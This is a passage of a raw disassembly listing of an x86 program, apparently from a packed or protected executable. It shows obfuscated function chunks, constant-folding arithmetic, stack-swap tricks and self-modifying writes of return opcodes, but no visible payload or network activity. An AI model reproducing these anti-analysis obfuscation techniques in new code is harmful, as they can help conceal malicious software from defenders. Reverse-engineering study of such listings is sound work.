; FUNCTION CHUNK AT 00450862 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045417D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454302 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004559EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045964A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045B345 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B7EE SIZE 00000009 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		test	al, al
		jz	loc_43A22D
		jmp	loc_44B7E5
sub_44BEBB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_44BECC:				; CODE XREF: sub_44D8CE:loc_452892j
		add	eax, 9C3D92C9h
		push	offset loc_44B905
		jmp	loc_45A18E
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_44BEDC:				; CODE XREF: sub_4557D4:loc_454234j
		call	sub_43A87E

loc_44BEE1:				; CODE XREF: hvvrg7ie:004557CFj
		mov	ds:dword_458D54, eax
		cmp	ds:dword_458D54, 0
		jnz	loc_456CA3
		jmp	loc_44BFC3
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
		xor	eax, 753777EDh
		jmp	sub_43E338
; ---------------------------------------------------------------------------

loc_44BF03:				; DATA XREF: sub_44AE37+B341o
		add	eax, 80063h
		xchg	eax, [esp]
		jmp	loc_43EFC3
; ---------------------------------------------------------------------------
		push	offset sub_439D7F
		jmp	locret_44A178
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457740

loc_44BF1B:				; CODE XREF: sub_457740:loc_4487BCj
		cmp	dword ptr [eax], 0
		jnz	loc_43FDD3
		jmp	sub_45A98D
; END OF FUNCTION CHUNK	FOR sub_457740

; =============== S U B	R O U T	I N E =======================================



sub_44BF29	proc near		; CODE XREF: sub_44107D+E383p
					; sub_44FB04+3p ...
		jb	sub_4439E7
		push	ebp
		mov	ebp, esp
		jmp	loc_449F29
sub_44BF29	endp


; =============== S U B	R O U T	I N E =======================================



sub_44BF37	proc near		; CODE XREF: sub_43DB4C-3E03p
					; hvvrg7ie:00459D8Bj

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044DDD7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456379 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	8CAD59F5h
		pop	esi
		sub	esi, 65A7CC85h
		xor	esi, 0AEB07BAEh
		add	esi, 768EC487h
		jmp	loc_456379
sub_44BF37	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7BD

loc_44BF58:				; CODE XREF: sub_45B7BD:loc_443F80j
		xchg	ebp, [esp+0]
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_45B7BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45006C

loc_44BF61:				; CODE XREF: sub_45006C+16j
		jmp	loc_43B937
; END OF FUNCTION CHUNK	FOR sub_45006C

; =============== S U B	R O U T	I N E =======================================



sub_44BF66	proc near		; CODE XREF: hvvrg7ie:0043A2ECp
					; hvvrg7ie:loc_43A776p	...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004408A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004432A4 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044BFCE SIZE 0000000E BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, eax
		jmp	loc_4432A4
sub_44BF66	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_44BF74:				; CODE XREF: sub_43D531+1BB34j
		jmp	loc_455D2F
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_44BF79:				; CODE XREF: sub_43EB47+C8C0j
					; hvvrg7ie:004590B5j
		jmp	loc_43E9C5
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44BF7E:				; CODE XREF: sub_454099-CD7Cj
		jmp	loc_44F60E
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

locret_44BF83:				; CODE XREF: hvvrg7ie:loc_43CD88j
		retn
; ---------------------------------------------------------------------------

loc_44BF84:				; CODE XREF: hvvrg7ie:0043B9AFj
		jmp	locret_448422
; ---------------------------------------------------------------------------

loc_44BF89:				; CODE XREF: hvvrg7ie:00458198j
		jnp	loc_457BAC
		pop	esi
		jmp	sub_445F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44BF95:				; CODE XREF: sub_44616F:loc_450C89j
		cdq
		jno	loc_449BA3
		or	edi, 0E9983E9Fh
		and	eax, edx
		jmp	loc_44A89A
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_44BFA9:				; CODE XREF: hvvrg7ie:loc_440FE2j
					; sub_44E68D:loc_454173j
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_4425F0
		mov	eax, 1171F650h
		call	sub_450C5A
		push	esi
		jmp	loc_451820
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_44BFC3:				; CODE XREF: sub_4557D4-98E1j
		jz	loc_43CFF8
		jmp	loc_445C26
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BF66

loc_44BFCE:				; CODE XREF: sub_44BF66:loc_4408A9j
		add	edx, 0BC32D081h
		xchg	edx, [esp+0]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_44BF66
; ---------------------------------------------------------------------------
		test	al, al
		jz	locret_44FCDE
		jmp	loc_449FF9
; ---------------------------------------------------------------------------

loc_44BFE9:				; CODE XREF: hvvrg7ie:00452BC3j
		jo	loc_45675A
		adc	esi, 0FF3C78F5h

; =============== S U B	R O U T	I N E =======================================



sub_44BFF5	proc near		; CODE XREF: sub_445CCD-6937p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BDAA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043CCEC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F024 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043FA22 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FC48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440E35 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444EC8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444EE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445292 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004467AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C5D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004474DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447520 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044768E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447C23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CA9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044804C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AE2C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DED0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044EBFE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453304 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453AAB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455416 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004566CD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045758E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459BAB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045A9CE SIZE 00000015 BYTES

		xchg	ecx, [esp+4+var_4]
		pop	ecx
		popf
		jmp	loc_459BAB
sub_44BFF5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4550CA

loc_44BFFF:				; CODE XREF: sub_4550CA:loc_452EEBj
		mov	esi, eax
		push	offset sub_4490B2
		jmp	nullsub_408
; END OF FUNCTION CHUNK	FOR sub_4550CA
; ---------------------------------------------------------------------------
		xor	eax, 9432DDCh
		push	offset sub_443766
		jmp	locret_44E01D
; ---------------------------------------------------------------------------
		jnz	loc_44CD9B
		jmp	sub_45B6F1
; ---------------------------------------------------------------------------

loc_44C026:				; CODE XREF: hvvrg7ie:0044CDE2j
		cmp	ebp, 98929F9Bh
		jmp	loc_44FE91
; ---------------------------------------------------------------------------

loc_44C031:				; DATA XREF: sub_4589D3:loc_4473F9o
		push	9F08E199h
		pop	eax
		sub	eax, 5C911E2h
		or	eax, 7FE72F50h
		add	eax, 0F6871AD2h
		add	eax, ebp
		add	eax, 978F533h
		jmp	loc_43A46A
; ---------------------------------------------------------------------------
		call	sub_452D54

locret_44C05B:				; CODE XREF: hvvrg7ie:loc_44045Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B5C

loc_44C05C:				; CODE XREF: sub_442B5C+16j
		jmp	loc_43BEF3
; END OF FUNCTION CHUNK	FOR sub_442B5C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44C062:				; CODE XREF: sub_44B3F1+2C56j
		jmp	nullsub_108
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_44C067:				; CODE XREF: sub_43A625+11168j
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F66B

loc_44C06C:				; CODE XREF: sub_44F66B-4A67j
		jmp	sub_44C072
; END OF FUNCTION CHUNK	FOR sub_44F66B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44C072	proc near		; CODE XREF: sub_450F97-DA9Ep
					; sub_451E6D:loc_4493E9p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C400 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D716 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043E3C7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441602 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044389C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00446C35 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044899F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045049B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454BE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B43 SIZE 00000005 BYTES

		jb	loc_45049B
		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+8+var_8]
		mov	esp, ebp
		jmp	loc_44899F
sub_44C072	endp

; ---------------------------------------------------------------------------
		ror	esi, 16h
		jmp	loc_452EB9
; ---------------------------------------------------------------------------
		push	467A96F1h
		pop	edx
		xor	edx, 0C75CAEFCh
		or	edx, 4414CFF1h
		rol	edx, 0Eh
		xor	edx, 46C6A18h
		push	esi
		jmp	loc_43F0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_44C0B1:				; CODE XREF: sub_459B45-17ABj
		jl	loc_44E971
; END OF FUNCTION CHUNK	FOR sub_459B45
; START	OF FUNCTION CHUNK FOR sub_451176

loc_44C0B7:				; CODE XREF: sub_451176-B72Dj
		jmp	nullsub_172
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
		or	ebp, esi
		popf
		jmp	loc_44E96F
; ---------------------------------------------------------------------------

loc_44C0C4:				; CODE XREF: hvvrg7ie:00439C81j
		jz	loc_44012C

loc_44C0CA:				; CODE XREF: hvvrg7ie:004573AEj
		jmp	loc_440E7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_44C0CF:				; CODE XREF: sub_4405AA+10D7Cj
		jmp	loc_4404CA
; END OF FUNCTION CHUNK	FOR sub_4405AA
; ---------------------------------------------------------------------------

loc_44C0D4:				; CODE XREF: hvvrg7ie:0043ED8Cj
		jmp	loc_4453AF
; ---------------------------------------------------------------------------
		not	ebp
		ror	edx, 14h
		jmp	loc_44012C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DE

loc_44C0E3:				; CODE XREF: sub_4421DE:loc_44DBDCj
		jg	loc_453378
		jmp	loc_45B21D
; END OF FUNCTION CHUNK	FOR sub_4421DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A13

loc_44C0EE:				; CODE XREF: sub_458A13:loc_44654Dj
		mov	edx, ds:dword_440588
		or	edx, edx
		jnz	loc_44D61D
		jmp	loc_450F5B
; END OF FUNCTION CHUNK	FOR sub_458A13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44C101:				; CODE XREF: sub_44BCAE-9B8Fj
		jz	loc_43DD18
		jmp	loc_43F4AA
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44C10C:				; CODE XREF: sub_44D2F8:loc_449EACj
		xor	eax, 0E3E700C4h

loc_44C112:				; CODE XREF: hvvrg7ie:loc_44A68Cj
		add	eax, ebp
		add	eax, 67770421h
		push	eax
		jmp	loc_4474D7
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		sub	esi, 0C9679F0h
		jmp	loc_45B705
; ---------------------------------------------------------------------------

loc_44C12B:				; CODE XREF: hvvrg7ie:loc_4503E5j
					; DATA XREF: sub_43C811+13BCAo
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_44C12D:				; CODE XREF: hvvrg7ie:00449F3Aj
		jmp	loc_43A65B

; =============== S U B	R O U T	I N E =======================================



sub_44C132	proc near		; CODE XREF: sub_441AB2:loc_4479E5j
					; sub_458F53+4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439941 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044F5E4 SIZE 00000005 BYTES

		push	ebx
		push	ebp
		pop	ebx
		xchg	ebx, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		jmp	loc_439941
sub_44C132	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44C140:				; CODE XREF: sub_440643+BEA8j
		rol	edi, 1
		add	edi, 0C2FBBF45h
		xchg	edi, [esp+10h+var_10]
		jmp	loc_4460F3
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F91

loc_44C150:				; CODE XREF: sub_446F91+Bj
		pushf

loc_44C151:				; CODE XREF: hvvrg7ie:00457DA5j
		push	4F178E26h
		pop	edi
		and	edi, 9396F257h
		sub	edi, 0AB05601Ah
		xor	edi, 650D546Fh
		sub	edi, 0E359D3CDh
		jmp	loc_4409CD
; END OF FUNCTION CHUNK	FOR sub_446F91
; ---------------------------------------------------------------------------

loc_44C174:				; CODE XREF: hvvrg7ie:00450113j
		jl	loc_449D26
; START	OF FUNCTION CHUNK FOR sub_4437CA

loc_44C17A:				; CODE XREF: sub_4437CA+14550j
		jmp	nullsub_275
; END OF FUNCTION CHUNK	FOR sub_4437CA
; ---------------------------------------------------------------------------

loc_44C17F:				; CODE XREF: hvvrg7ie:004477D4j
		jmp	loc_439EA0
; ---------------------------------------------------------------------------
		pushf
		mov	ebx, [ecx]
		jmp	loc_449D26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44C18C:				; CODE XREF: sub_454099:loc_453D5Ej
		xchg	esi, [esp+8+var_8]
		jmp	sub_44CB64
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

locret_44C194:				; CODE XREF: hvvrg7ie:loc_44BAD6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44C195:				; CODE XREF: sub_4544DD-B2C4j
		jmp	loc_457366
; END OF FUNCTION CHUNK	FOR sub_4544DD

; =============== S U B	R O U T	I N E =======================================



sub_44C19A	proc near		; CODE XREF: sub_450AA8+4EA6p
					; hvvrg7ie:0045902Dj

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		mov	ebp, eax
		pop	eax
		retn
sub_44C19A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44C1A5:				; CODE XREF: sub_44D2F8-13B2Bj
		jmp	loc_455281
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_44C1AA:				; CODE XREF: sub_446F6D:loc_44822Aj
					; sub_44398A:loc_451554j
		push	esi
		mov	esi, ebp
		jmp	loc_440536
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
		add	eax, 0E435F007h
		rol	eax, 1Ch

; =============== S U B	R O U T	I N E =======================================



sub_44C1BB	proc near		; CODE XREF: sub_441242:loc_455DFEj
		push	ebx
		push	offset loc_45B2CF
		jmp	nullsub_223
sub_44C1BB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_44C1C6:				; CODE XREF: sub_441E23:loc_44D5DDj
		ror	eax, 13h
		xor	eax, 0B2585CE9h
		sub	eax, 386F9018h
		ror	eax, 0Dh
		sub	eax, 79525119h
		jmp	loc_439746
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44C1E3:				; CODE XREF: sub_445CCD:loc_43C1BDj
		push	38C66877h
		sub	ecx, esi
		shl	ebp, 13h
		cdq
		jmp	loc_43B6D2
; END OF FUNCTION CHUNK	FOR sub_445CCD

; =============== S U B	R O U T	I N E =======================================



sub_44C1F3	proc near		; CODE XREF: hvvrg7ie:00441C3Bj
					; sub_447610+11883p

; FUNCTION CHUNK AT 0043B5F1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DEF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E0EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F6F7 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043FAA3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446339 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004524E9 SIZE 00000015 BYTES

		xchg	esi, [esp+0]

loc_44C1F6:				; CODE XREF: hvvrg7ie:00439703j
		pop	esi
		push	edx
		push	0A8EDF66Dh
		pop	edx
		xor	edx, 0C8E4EEA3h
		add	edx, 29F030Dh
		jmp	loc_446339
sub_44C1F3	endp


; =============== S U B	R O U T	I N E =======================================



sub_44C20F	proc near		; CODE XREF: sub_4031FD+AAp
					; sub_404A3E+B9p ...
		call	sub_43D8F7

loc_44C214:				; CODE XREF: hvvrg7ie:00450DB8j
		jmp	sub_456DE7
sub_44C20F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE42

loc_44C219:				; CODE XREF: sub_44AE42+Dj
		jmp	loc_45879D
; END OF FUNCTION CHUNK	FOR sub_44AE42
; ---------------------------------------------------------------------------

loc_44C21E:				; CODE XREF: hvvrg7ie:004417EDj
		lea	eax, nullsub_495
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_495
; ---------------------------------------------------------------------------
		call	nullsub_483
		jmp	ds:dword_41D134
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DFB

loc_44C237:				; CODE XREF: sub_457DFB+2389j
		jmp	nullsub_416
; END OF FUNCTION CHUNK	FOR sub_457DFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8A4

loc_44C23C:				; CODE XREF: sub_44B8A4+13j
		jmp	loc_43D5B6
; END OF FUNCTION CHUNK	FOR sub_44B8A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_44C241:				; CODE XREF: sub_446F26+Cj
		jmp	loc_4506CF
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_44C246:				; CODE XREF: sub_44398A-3440j
		jmp	loc_45A72C
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------

loc_44C24B:				; CODE XREF: hvvrg7ie:0043DD65j
		jmp	loc_44A7CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_483. PRESS KEYPAD	"+" TO EXPAND]
		db 88h,	0B0h, 79h
		dd 0C9E90000h, 0F0000DDh, 8B0586h, 7FD3E900h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44C267	proc near		; CODE XREF: hvvrg7ie:0043B08Ej
					; sub_44DF5A+6p

; FUNCTION CHUNK AT 0044E131 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004574BB SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	6ADD513Bh
		pop	eax
		add	eax, 0E016D740h
		xor	eax, 0C91952D7h
		call	sub_450C5A
		mov	ds:dword_41D0DC, eax
		jmp	loc_44E131
sub_44C267	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CAB0

loc_44C28D:				; CODE XREF: sub_44CAB0+1Aj
		pop	ebx
		lea	eax, loc_45B635
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B635
; END OF FUNCTION CHUNK	FOR sub_44CAB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_44C29C:				; CODE XREF: sub_450810:loc_45B635j
		pop	edx
		jmp	loc_441D72
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_44C2A2:				; CODE XREF: sub_4466CE+E097j
		adc	esi, 9523BB1Dh

loc_44C2A8:				; CODE XREF: hvvrg7ie:loc_45082Bj
		push	eax
		lea	eax, loc_457315+3
		push	eax
		push	edx
		mov	edx, eax
		xchg	edx, [esp+10h+var_10]
		jmp	loc_444967
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44C2BB:				; CODE XREF: sub_4465A6:loc_44026Bj
		lea	eax, nullsub_6
		call	sub_44BC0E
; END OF FUNCTION CHUNK	FOR sub_4465A6
; START	OF FUNCTION CHUNK FOR sub_43BA56

loc_44C2C6:				; CODE XREF: sub_43BA56+Dj
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_43BA56
; ---------------------------------------------------------------------------

loc_44C2CB:				; CODE XREF: hvvrg7ie:0044B00Aj
		test	ebp, 9A9338Ch
		jmp	loc_4533EC
; ---------------------------------------------------------------------------
		mov	ds:off_41D0AC, eax
		lea	eax, loc_43D64E
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D64E

; =============== S U B	R O U T	I N E =======================================



sub_44C2EA	proc near		; CODE XREF: sub_41088C+9Bp
					; hvvrg7ie:0044EA51j
					; DATA XREF: ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004399DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C548 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E7AB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004409AD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440F1C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044511E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004477A8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004478EE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A539 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA3B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044EA5C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F5A2 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044FE46 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454354 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456368 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00457DC8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045810F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A8B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B09C SIZE 00000014 BYTES

		push	ecx
		mov	ecx, esi
		jmp	loc_4409AD
sub_44C2EA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C2F2:				; CODE XREF: hvvrg7ie:004470D6j
		jge	loc_44ED85
; START	OF FUNCTION CHUNK FOR sub_43AF52

loc_44C2F8:				; CODE XREF: sub_43AF52:loc_4470BAj
		add	esi, 352267DAh
		push	offset loc_43D6C4
		jmp	nullsub_149
; END OF FUNCTION CHUNK	FOR sub_43AF52

; =============== S U B	R O U T	I N E =======================================



sub_44C308	proc near		; DATA XREF: hvvrg7ie:00439404o
		add	edx, 1EDC97DFh
		call	sub_44E463
sub_44C308	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44AA1C

loc_44C313:				; CODE XREF: sub_44AA1C:loc_43C663j
		xor	eax, 0BA5DE386h
		add	ecx, eax
		pop	eax
		mov	[ecx], eax
		jmp	loc_45A4C1
; END OF FUNCTION CHUNK	FOR sub_44AA1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443086

loc_44C323:				; CODE XREF: sub_443086+Cj
		jnz	loc_44CE64
		jmp	loc_45282F
; END OF FUNCTION CHUNK	FOR sub_443086
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C32F:				; CODE XREF: hvvrg7ie:0045A937j
		jmp	loc_454D46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44C334:				; CODE XREF: sub_43AB99+109C3j
		jmp	loc_4449FD
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44C339:				; CODE XREF: sub_45541B-C2B7j
		jmp	loc_458A4C
; END OF FUNCTION CHUNK	FOR sub_45541B

; =============== S U B	R O U T	I N E =======================================



sub_44C33E	proc near		; CODE XREF: hvvrg7ie:0043A01Aj
					; sub_456CD4:loc_44F755p

; FUNCTION CHUNK AT 0043EF55 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8FA SIZE 00000016 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0FF1A0E05h
		pop	edx
		xor	edx, 0BFE529E2h
		or	edx, 894F4D2Dh
		jmp	loc_440694
sub_44C33E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C359	proc near		; CODE XREF: hvvrg7ie:0044C6E7j
					; hvvrg7ie:loc_451FFDp

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		add	edi, 575E49Ch
		xchg	edi, [esp-4+arg_0]
		jmp	sub_450C5A
sub_44C359	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44C36B:				; CODE XREF: hvvrg7ie:loc_440246j
					; sub_43D285:loc_450B7Ej
		pop	esi
		rol	ecx, 1
		sub	ecx, 7FC0AA14h
		add	ecx, 2FBB50Dh
		mov	[ecx], eax
		jmp	loc_453B3C
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D52

loc_44C381:				; CODE XREF: sub_454D52:loc_447495j
		mov	esi, edx
; END OF FUNCTION CHUNK	FOR sub_454D52
; START	OF FUNCTION CHUNK FOR sub_458095

loc_44C383:				; CODE XREF: sub_458095:loc_43CB0Aj
		sbb	edx, eax
		jmp	loc_4423E2
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
		push	0F34EFEC3h
		pop	edx
		and	edx, 0D6C2AA84h
		add	edx, 2E02C88Ch
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_43CAE2
		jmp	loc_45082B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

